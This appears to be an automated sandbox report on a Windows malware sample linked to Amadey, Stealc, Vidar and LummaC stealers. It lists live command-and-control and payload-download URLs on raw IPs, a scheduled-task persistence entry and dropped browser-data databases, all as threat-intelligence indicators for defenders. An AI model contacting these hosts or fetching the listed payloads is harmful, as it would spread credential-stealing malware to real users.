http://185.215.113.206/c4becf79229cb002.phpation	file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	false		high
http://repository.certum.pl/ctsca2021.cer0	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
http://subca.ocsp-certum.com05	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
http://subca.ocsp-certum.com02	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	false		high
http://subca.ocsp-certum.com01	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php1012911001	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.certum.pl/ctnca2.crl0l	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
http://repository.certum.pl/ctnca2.cer09	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
http://31.41.244.11/files/7995533987/JoYUT4N.exeshqos.dll	skotes.exe, 00000017.00000002.3389127239.000000000120B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://apis.google.com	chromecache_175.6.dr	false		high
http://185.215.113.206ta	file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	false		high
http://www.certum.pl/CPS0	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2754050944.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpge	file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	KFCFBAAE.0.dr	false		high
http://crl.certum.pl/ctnca.crl0k	skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high
http://31.41.244.11/files/7995533987/JoYUT4N.exe	skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3389127239.000000000120B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllu	file.exe, 00000000.00000002.2722572353.0000000000B82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	KFCFBAAE.0.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high
https://ac.ecosia.org/autocomplete?q=	KFCFBAAE.0.dr	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_175.6.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high
http://31.41.244.11/files/7995533987/JoYUT4N.exeXYZ0123456789	skotes.exe, 00000017.00000002.3389127239.000000000125E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpI	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org	KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpM	file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206	file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpm	skotes.exe, 00000017.00000002.3389127239.000000000128C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpTE	file.exe, 00000000.00000002.2748285132.00000000230D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	KFCFBAAE.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpW	file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.19.206	play.google.com	United States	15169	GOOGLEUS	false
142.250.181.142	www3.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
142.250.181.78	plus.l.google.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570584
Start date and time:	2024-12-07 10:50:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@39/55@8/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.210.172, 172.217.21.35, 172.217.19.238, 64.233.162.84, 172.217.17.78, 142.250.181.10, 172.217.17.42, 142.250.181.74, 172.217.19.202, 172.217.17.74, 172.217.19.170, 172.217.19.234, 142.250.181.106, 216.58.208.234, 142.250.181.138, 142.250.181.42
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, clientservices.googleapis.com, ogads-pa.googleapis.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:51:38	API Interceptor	312x Sleep call for process: file.exe modified
04:53:02	API Interceptor	106x Sleep call for process: skotes.exe modified
10:52:07	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
185.215.113.16	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC Stealer	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	http://liathletic.com	Get hash	malicious	Unknown	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	https://m.frownpasture.top/xqbgOoR7LyCdyD4DEHLii/a8f4AAdjCXhECXlkXzJZXUg0VwwMXxcvBW8NcRstA0McXyNaQkY?_t=1733539511823#	Get hash	malicious	Unknown	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	40.126.53.13 4.245.163.56 13.107.246.63 23.218.208.109
6271f898ce5be7dd52b0fc260d0662b3	Outstanding_Payment.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	Outstanding_Payment.vbs_.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	Outstanding_Payment.vbs_.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	file.exe	Get hash	malicious	LummaC Stealer	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	BGM LAW GROUP - RFP 2024.pdf	Get hash	malicious	Unknown	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	Pago pendiente.vbs	Get hash	malicious	XenoRAT	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	Outstanding_Payment.vbs_.vbs	Get hash	malicious	Unknown	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
	Platinum Hall County, Georgia Proposal (16.6 KB).docx	Get hash	malicious	KnowBe4	Browse	150.171.27.10 23.206.197.17 20.223.36.55 20.199.58.43 150.171.28.10 23.206.197.33
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Unknown	Browse	20.198.119.143
	INQUIRY REQUEST AND PRICES_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.119.143
	RFQ Order list #2667747.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.119.143
	Payment Details Ref#577767.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.119.143
	IBAN Payment confirmation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.119.143
	Overdue_payment.pdf.exe	Get hash	malicious	AgentTesla	Browse	20.198.119.143
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.198.119.143
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.198.119.143
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.198.119.143
	TECHNICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	20.198.119.143

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BFHDAEHDAKECGCAKFCFIJDHJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHJDGHIJDGCBAAAAAFIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HCAFIJDGHCBFHJKFCGIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAKFCGIJKJKFHIDHIII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBAECBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFIEBFHIDBAKJJJJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBAAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
